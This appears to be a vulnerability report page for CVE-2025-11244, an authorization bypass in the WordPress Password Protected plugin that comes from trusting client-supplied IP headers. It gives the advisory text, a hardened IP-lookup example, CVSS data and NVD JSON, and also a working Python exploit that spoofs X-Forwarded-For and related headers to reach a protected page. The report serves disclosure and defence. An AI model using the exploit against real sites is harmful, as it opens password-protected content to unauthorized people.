Security Vulnerability Report
CVE-2025-11244 CVSS 3.7 LOW

CVE-2025-11244

Published: 2025-10-25 06:15:35
Last Modified: 2026-04-15 00:35:42

Description

The Password Protected plugin for WordPress is vulnerable to authorization bypass via IP address spoofing in all versions up to, and including, 2.7.11. This is due to the plugin trusting client-controlled HTTP headers (such as X-Forwarded-For, HTTP_CLIENT_IP, and similar headers) to determine user IP addresses in the `pp_get_ip_address()` function when the "Use transients" feature is enabled. This makes it possible for attackers to bypass authorization by spoofing these headers with the IP address of a legitimately authenticated user, granted the "Use transients" option is enabled (non-default configuration) and the site is not behind a CDN or reverse proxy that overwrites these headers.
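A defender-side illustration, added here and not taken from the plugin or the report: a small Python model of the flawed lookup the description refers to, beside a hardened lookup that trusts REMOTE_ADDR (set from the TCP peer, not from any header) unless that peer is a configured proxy, and then walks X-Forwarded-For from the right to skip trusted hops. The function names, the trusted-proxy range and the sample `$_SERVER`-style dictionaries are constructed for the example.

```python
import ipaddress
from typing import Mapping

# Constructed sample: the reverse proxies we operate and therefore trust to
# set X-Forwarded-For. The vulnerable pattern has no such list; every header
# the client sends is believed.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Header names of the kind the description says the plugin trusts, in the
# $_SERVER key form PHP exposes them under.
FORWARDED_KEYS = ("HTTP_CLIENT_IP", "HTTP_X_FORWARDED_FOR", "HTTP_X_REAL_IP")


def vulnerable_get_ip(server: Mapping[str, str]) -> str:
    """Models the described flaw: the first client-controlled header wins."""
    for key in FORWARDED_KEYS:
        if server.get(key):
            return server[key].split(",")[0].strip()
    return server.get("REMOTE_ADDR", "")


def hardened_get_ip(server: Mapping[str, str], trusted=TRUSTED_PROXIES) -> str:
    """Return REMOTE_ADDR unless the peer is one of our proxies; in that case
    take the rightmost X-Forwarded-For hop that is not itself a trusted proxy."""
    remote = server.get("REMOTE_ADDR", "")
    try:
        peer = ipaddress.ip_address(remote)
    except ValueError:
        return ""  # no usable peer address at all
    if not any(peer in net for net in trusted):
        return remote  # direct connection: forwarded headers are attacker input
    hops = [h.strip() for h in server.get("HTTP_X_FORWARDED_FOR", "").split(",")]
    for hop in reversed([h for h in hops if h]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote  # malformed chain: fall back to the proxy address
        if not any(addr in net for net in trusted):
            return str(addr)  # first hop our proxies did not add themselves
    return remote
```

Only the hop appended by your own proxy is trustworthy; anything the client placed in the header earlier is treated as untrusted, which is what makes the rightmost-walk safe even behind a CDN.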

CVSS Details

CVSS Score
3.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Password Protected plugin <= 2.7.11 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11244 PoC - IP Spoofing Authorization Bypass
# Affected: WordPress Password Protected Plugin <= 2.7.11
# Condition: 'Use transients' option must be enabled
import requests
import sys

TARGET_URL = "http://target-wordpress-site.com/"
LEGITIMATE_USER_IP = "192.168.1.100"  # IP of a legitimately authenticated user
PROTECTED_PAGE = "http://target-wordpress-site.com/protected-page/"


def exploit_ip_spoofing():
    """
    Exploit the IP spoofing vulnerability in Password Protected plugin.
    The plugin trusts X-Forwarded-For header to determine user IP address.
    """
    headers = {
        # Spoof the IP address of a legitimate authenticated user
        'X-Forwarded-For': LEGITIMATE_USER_IP,
        'X-Client-IP': LEGITIMATE_USER_IP,
        'HTTP_CLIENT_IP': LEGITIMATE_USER_IP,
        'X-Real-IP': LEGITIMATE_USER_IP,
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Spoofing IP: {LEGITIMATE_USER_IP}")
    print(f"[*] Sending request with spoofed headers...")

    try:
        # First request - attempt to bypass protection
        response = requests.get(PROTECTED_PAGE, headers=headers, timeout=10)

        if response.status_code == 200:
            # Check if we got access to protected content
            if 'password' not in response.text.lower() or 'protected' not in response.text.lower():
                print("[+] SUCCESS: Authorization bypass achieved!")
                print(f"[+] Accessed protected content without password")
                return True

        print("[-] Failed to bypass authorization")
        print("[*] Possible reasons:")
        print("    - 'Use transients' option is not enabled")
        print("    - Site is behind a CDN/reverse proxy that overwrites headers")
        print("    - Incorrect target IP address")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11244 - Password Protected Plugin IP Spoofing PoC")
    print("=" * 60)
    exploit_ip_spoofing()

References

https://plugins.trac.wordpress.org/browser/password-protected/tags/2.7.11/includes/transient-functions.php#L33
https://research.cleantalk.org/cve-2025-11244/
https://www.wordfence.com/threat-intel/vulnerabilities/id/30b4371d-54a2-4111-ad2c-b38b6b31884d?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11244",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-25T06:15:34.910",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Password Protected plugin for WordPress is vulnerable to authorization bypass via IP address spoofing in all versions up to, and including, 2.7.11. This is due to the plugin trusting client-controlled HTTP headers (such as X-Forwarded-For, HTTP_CLIENT_IP, and similar headers) to determine user IP addresses in the `pp_get_ip_address()` function when the \"Use transients\" feature is enabled. This makes it possible for attackers to bypass authorization by spoofing these headers with the IP address of a legitimately authenticated user, granted the \"Use transients\" option is enabled (non-default configuration) and the site is not behind a CDN or reverse proxy that overwrites these headers."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 3.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-285"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/password-protected/tags/2.7.11/includes/transient-functions.php#L33", "source": "[email protected]"},
      {"url": "https://research.cleantalk.org/cve-2025-11244/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30b4371d-54a2-4111-ad2c-b38b6b31884d?source=cve", "source": "[email protected]"}
    ]
  }
}